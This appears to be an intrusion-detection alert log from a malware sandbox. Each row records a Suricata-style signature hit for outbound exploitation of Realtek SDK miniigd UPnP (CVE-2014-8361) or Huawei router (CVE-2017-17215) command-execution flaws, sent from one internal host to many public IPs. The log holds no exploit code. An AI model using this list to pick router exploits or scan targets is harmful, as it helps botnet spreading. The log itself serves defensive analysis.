                                                07/20/24-23:05:58.107636TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613746252869192.168.2.1499.252.205.139
                                                07/20/24-23:06:01.913378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5910052869192.168.2.1431.110.108.63
                                                07/20/24-23:06:03.345104TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613869652869192.168.2.14188.244.73.220
                                                07/20/24-23:05:37.457748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24925252869192.168.2.14200.238.182.46
                                                07/20/24-23:05:45.412131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400237215192.168.2.1441.193.133.144
                                                07/20/24-23:06:17.635185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614324652869192.168.2.14154.119.243.101
                                                07/20/24-23:06:55.227510TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614039852869192.168.2.1459.247.240.190
                                                07/20/24-23:05:46.725488TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5887452869192.168.2.1452.191.253.144
                                                07/20/24-23:06:08.543985TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615579652869192.168.2.1427.3.122.168
                                                07/20/24-23:06:45.931745TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615134652869192.168.2.1499.14.75.70
                                                07/20/24-23:05:40.471777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542252869192.168.2.1495.244.78.147
                                                07/20/24-23:05:58.706531TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613629252869192.168.2.14135.37.186.112
                                                07/20/24-23:05:59.198584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3763052869192.168.2.14176.198.224.23
                                                07/20/24-23:05:59.335445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4568052869192.168.2.14175.170.231.7
                                                07/20/24-23:07:06.714084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5499252869192.168.2.1483.207.51.198
                                                07/20/24-23:06:18.422288TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23651052869192.168.2.148.221.108.93
                                                07/20/24-23:05:52.515827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5129252869192.168.2.14189.17.62.143
                                                07/20/24-23:06:08.078658TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613634052869192.168.2.1477.217.131.179
                                                07/20/24-23:05:38.517434TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615407252869192.168.2.14152.153.83.132
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061637215192.168.2.1441.80.48.51
                                                07/20/24-23:06:04.825020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26007452869192.168.2.14204.151.52.231
                                                07/20/24-23:06:29.529818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5387652869192.168.2.14131.208.192.207
                                                07/20/24-23:05:38.185047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614448652869192.168.2.14121.164.80.162
                                                07/20/24-23:05:59.324002TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24910852869192.168.2.14163.92.171.162
                                                07/20/24-23:05:48.253106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614998052869192.168.2.1446.3.114.133
                                                07/20/24-23:06:01.185323TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25679052869192.168.2.14210.69.210.81
                                                07/20/24-23:06:08.581424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3539852869192.168.2.14217.36.166.226
                                                07/20/24-23:05:52.531304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23874652869192.168.2.14129.121.134.219
                                                07/20/24-23:06:03.014485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25632852869192.168.2.14216.254.35.160
                                                07/20/24-23:05:35.387821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4116252869192.168.2.14205.9.202.98
                                                07/20/24-23:06:12.623995TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4677852869192.168.2.1459.97.251.204
                                                07/20/24-23:05:34.624854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864437215192.168.2.1445.182.212.164
                                                07/20/24-23:05:40.334659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23579452869192.168.2.1498.249.26.162
                                                07/20/24-23:06:03.018252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614916852869192.168.2.14199.28.141.22
                                                07/20/24-23:05:40.468265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4168852869192.168.2.14164.63.211.187
                                                07/20/24-23:07:37.315997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090837215192.168.2.14197.203.48.230
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3850037215192.168.2.14124.220.216.129
                                                07/20/24-23:05:57.947146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5006652869192.168.2.1420.69.99.207
                                                07/20/24-23:05:47.218209TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615643452869192.168.2.14120.12.145.48
                                                07/20/24-23:06:02.373413TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615654652869192.168.2.14217.74.204.181
                                                07/20/24-23:06:00.427147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497637215192.168.2.14197.193.127.78
                                                07/20/24-23:05:33.830838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637437215192.168.2.14197.48.219.131
                                                07/20/24-23:05:45.447173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494437215192.168.2.1441.1.216.176
                                                07/20/24-23:05:58.983376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4133452869192.168.2.1462.67.165.78
                                                07/20/24-23:05:33.862992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332037215192.168.2.14197.220.34.254
                                                07/20/24-23:06:02.508899TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5071852869192.168.2.14189.26.184.105
                                                07/20/24-23:06:03.249838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4083852869192.168.2.14144.226.191.60
                                                07/20/24-23:05:45.293090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4820052869192.168.2.14130.125.245.169
                                                07/20/24-23:06:23.120505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614057652869192.168.2.14198.13.151.206
                                                07/20/24-23:05:57.002874TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615341652869192.168.2.14186.140.123.10
                                                07/20/24-23:05:58.860933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5576652869192.168.2.14129.196.243.121
                                                07/20/24-23:05:59.394050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614477252869192.168.2.14161.45.96.72
                                                07/20/24-23:06:01.829267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5907852869192.168.2.1463.83.58.182
                                                07/20/24-23:06:12.572216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615214452869192.168.2.14170.223.132.126
                                                07/20/24-23:05:37.454427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5163652869192.168.2.14204.66.149.99
                                                07/20/24-23:05:37.456840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4634852869192.168.2.14116.137.1.46
                                                07/20/24-23:06:01.535181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4331652869192.168.2.14175.131.12.125
                                                07/20/24-23:05:52.504672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23301852869192.168.2.1413.143.242.72
                                                07/20/24-23:05:46.827044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4850652869192.168.2.1414.207.98.101
                                                07/20/24-23:06:12.572216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6084852869192.168.2.1425.111.49.43
                                                07/20/24-23:05:45.460569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419037215192.168.2.14157.64.44.147
                                                07/20/24-23:05:45.439166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4315437215192.168.2.14130.5.25.9
                                                07/20/24-23:06:03.679529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5602652869192.168.2.14182.27.195.239
                                                07/20/24-23:06:15.439915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5496252869192.168.2.1499.203.53.121
                                                07/20/24-23:06:19.491493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4731852869192.168.2.14165.36.32.222
                                                07/20/24-23:05:46.023949TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4403652869192.168.2.1461.177.161.149
                                                07/20/24-23:05:56.888787TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615053052869192.168.2.14136.62.141.53
                                                07/20/24-23:05:39.060021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5458637215192.168.2.1475.242.188.72
                                                07/20/24-23:05:58.366780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3739852869192.168.2.14107.90.243.251
                                                07/20/24-23:06:02.953100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4066052869192.168.2.14193.28.16.55
                                                07/20/24-23:05:52.716020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23399452869192.168.2.1491.53.215.210
                                                07/20/24-23:05:38.538181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3951252869192.168.2.1449.30.236.251
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913237215192.168.2.14197.239.220.240
                                                07/20/24-23:05:38.939891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388837215192.168.2.1441.182.179.206
                                                07/20/24-23:05:40.457644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5108652869192.168.2.1477.83.231.0
                                                07/20/24-23:05:35.823353TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615531252869192.168.2.1493.120.173.5
                                                07/20/24-23:06:23.088978TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614004652869192.168.2.14177.192.100.150
                                                07/20/24-23:06:45.997240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3516652869192.168.2.14154.195.133.68
                                                07/20/24-23:05:59.442578TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592252869192.168.2.1460.161.200.238
                                                07/20/24-23:06:02.508900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25872252869192.168.2.141.179.53.254
                                                07/20/24-23:06:50.028546TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25788452869192.168.2.1477.65.43.181
                                                07/20/24-23:06:35.384402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3676852869192.168.2.14117.127.16.156
                                                07/20/24-23:05:39.777436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438037215192.168.2.14106.95.59.38
                                                07/20/24-23:05:39.055909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585037215192.168.2.1441.252.42.114
                                                07/20/24-23:06:01.535181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5033852869192.168.2.14204.45.41.209
                                                07/20/24-23:05:57.922651TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615426452869192.168.2.1494.62.92.125
                                                07/20/24-23:05:33.830838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652037215192.168.2.14197.157.247.234
                                                07/20/24-23:05:35.604858TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615567252869192.168.2.1427.205.21.176
                                                07/20/24-23:05:59.251571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115452869192.168.2.14189.254.123.220
                                                07/20/24-23:06:16.552344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637437215192.168.2.14197.213.170.176
                                                07/20/24-23:06:12.482858TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25668452869192.168.2.14149.73.181.225
                                                07/20/24-23:06:24.734892TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615353252869192.168.2.14185.5.149.16
                                                07/20/24-23:06:27.853068TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24393052869192.168.2.14175.131.12.125
                                                07/20/24-23:06:00.544318TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23563652869192.168.2.14180.193.127.65
                                                07/20/24-23:06:00.470172TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614758852869192.168.2.1425.197.167.180
                                                07/20/24-23:05:35.217231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614480252869192.168.2.14157.104.97.161
                                                07/20/24-23:05:45.259708TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615521452869192.168.2.14208.86.138.213
                                                07/20/24-23:05:59.471230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615050852869192.168.2.1481.224.30.46
                                                07/20/24-23:05:33.855567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478237215192.168.2.14110.124.171.180
                                                07/20/24-23:05:34.652423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.14197.160.70.240
                                                07/20/24-23:05:42.256029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140437215192.168.2.14197.84.133.143
                                                07/20/24-23:05:47.345531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248652869192.168.2.14202.54.99.106
                                                07/20/24-23:05:57.024016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4276452869192.168.2.14109.75.221.193
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973837215192.168.2.14197.206.48.74
                                                07/20/24-23:05:40.465472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23799852869192.168.2.14204.228.34.103
                                                07/20/24-23:05:57.702462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4962052869192.168.2.14201.109.19.43
                                                07/20/24-23:05:33.855567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636437215192.168.2.1441.135.32.84
                                                07/20/24-23:06:20.736535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3936852869192.168.2.1497.10.65.178
                                                07/20/24-23:06:51.585302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4499652869192.168.2.14208.32.105.243
                                                07/20/24-23:06:08.296284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614157652869192.168.2.1497.93.62.217
                                                07/20/24-23:05:38.685237TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614892252869192.168.2.14144.25.238.160
                                                07/20/24-23:05:56.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813637215192.168.2.1452.102.23.251
                                                07/20/24-23:05:47.570652TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4040652869192.168.2.1451.78.128.224
                                                07/20/24-23:06:00.464582TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4474452869192.168.2.14133.45.19.120
                                                07/20/24-23:05:37.542288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3583252869192.168.2.14172.126.0.115
                                                07/20/24-23:05:59.280739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4971652869192.168.2.14209.239.99.54
                                                07/20/24-23:05:46.135626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823037215192.168.2.14197.136.240.59
                                                07/20/24-23:05:50.537576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572637215192.168.2.14197.136.46.111
                                                07/20/24-23:05:52.728679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4068052869192.168.2.1498.121.52.186
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462637215192.168.2.1414.88.135.161
                                                07/20/24-23:06:09.714969TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615947252869192.168.2.1458.174.30.80
                                                07/20/24-23:05:59.204856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3466252869192.168.2.141.27.82.104
                                                07/20/24-23:05:47.014311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5203437215192.168.2.1441.92.3.24
                                                07/20/24-23:06:20.738854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613558452869192.168.2.14162.62.228.182
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376437215192.168.2.1441.46.124.193
                                                07/20/24-23:05:34.625707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127637215192.168.2.14157.38.20.146
                                                07/20/24-23:05:35.226653TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4979852869192.168.2.14204.66.149.99
                                                07/20/24-23:06:18.369794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6013652869192.168.2.14216.158.254.36
                                                07/20/24-23:05:58.787162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5374052869192.168.2.1474.72.162.6
                                                07/20/24-23:06:24.317926TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613852452869192.168.2.14149.180.184.56
                                                07/20/24-23:06:03.999855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4708452869192.168.2.14109.153.141.128
                                                07/20/24-23:06:13.676865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3638052869192.168.2.14114.59.223.176
                                                07/20/24-23:05:46.175472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410452869192.168.2.14211.43.222.47
                                                07/20/24-23:05:59.316014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5618852869192.168.2.14180.7.73.104
                                                07/20/24-23:05:45.634433TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615121852869192.168.2.14122.228.47.35
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530037215192.168.2.14157.204.130.3
                                                07/20/24-23:06:00.153687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5740252869192.168.2.1490.210.129.8
                                                07/20/24-23:06:51.995876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616001252869192.168.2.14115.14.197.229
                                                07/20/24-23:05:56.120599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990437215192.168.2.14157.163.110.116
                                                07/20/24-23:06:01.143972TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613385652869192.168.2.14210.23.138.187
                                                07/20/24-23:05:57.149453TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6086252869192.168.2.14161.67.254.245
                                                07/20/24-23:05:40.444876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25779252869192.168.2.145.238.81.248
                                                07/20/24-23:05:57.273333TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4006052869192.168.2.14143.90.94.100
                                                07/20/24-23:06:03.216294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3698052869192.168.2.14115.224.138.67
                                                07/20/24-23:06:37.456862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3981852869192.168.2.1445.140.203.53
                                                07/20/24-23:05:57.844842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613601452869192.168.2.14141.227.209.24
                                                07/20/24-23:06:11.236923TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613649652869192.168.2.1480.173.4.192
                                                07/20/24-23:05:59.239089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644252869192.168.2.14168.45.23.98
                                                07/20/24-23:05:39.525196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898852869192.168.2.1491.115.151.211
                                                07/20/24-23:05:52.494675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25392652869192.168.2.14146.2.42.140
                                                07/20/24-23:05:42.245742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827637215192.168.2.14157.252.41.112
                                                07/20/24-23:06:09.587283TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23494052869192.168.2.14111.86.168.149
                                                07/20/24-23:05:37.612113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4945852869192.168.2.14179.21.144.79
                                                07/20/24-23:05:38.312688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5674252869192.168.2.1497.189.105.6
                                                07/20/24-23:06:02.104627TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614542852869192.168.2.148.245.4.123
                                                07/20/24-23:05:37.442743TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24250852869192.168.2.1445.129.181.164
                                                07/20/24-23:05:47.433337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615383852869192.168.2.1454.172.8.61
                                                07/20/24-23:05:45.675032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3754052869192.168.2.14155.53.167.191
                                                07/20/24-23:05:33.829338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461237215192.168.2.14197.152.207.21
                                                07/20/24-23:05:48.432602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4402252869192.168.2.1466.147.118.218
                                                07/20/24-23:05:58.961618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5799852869192.168.2.14178.131.221.8
                                                07/20/24-23:05:37.979608TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613663652869192.168.2.1449.83.27.219
                                                07/20/24-23:05:37.542495TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23631252869192.168.2.14114.179.104.124
                                                07/20/24-23:05:35.345455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614319452869192.168.2.14142.219.250.29
                                                07/20/24-23:05:59.093934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24276852869192.168.2.1447.119.95.118
                                                07/20/24-23:06:15.798798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613838852869192.168.2.149.221.109.93
                                                07/20/24-23:05:52.570834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25057452869192.168.2.14176.247.246.75
                                                07/20/24-23:05:59.453008TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613557452869192.168.2.14194.174.131.9
                                                07/20/24-23:05:37.462432TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25313452869192.168.2.14212.202.97.136
                                                07/20/24-23:06:06.144517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615632052869192.168.2.1449.154.69.61
                                                07/20/24-23:05:57.013302TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24752652869192.168.2.1492.115.168.51
                                                07/20/24-23:05:52.486069TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25982452869192.168.2.14147.146.128.242
                                                07/20/24-23:05:58.794030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3362652869192.168.2.14219.175.221.8
                                                07/20/24-23:06:00.147952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615730452869192.168.2.14163.142.81.29
                                                07/20/24-23:06:03.231512TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24371452869192.168.2.14172.186.38.12
                                                07/20/24-23:05:46.117104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4557452869192.168.2.14207.210.54.245
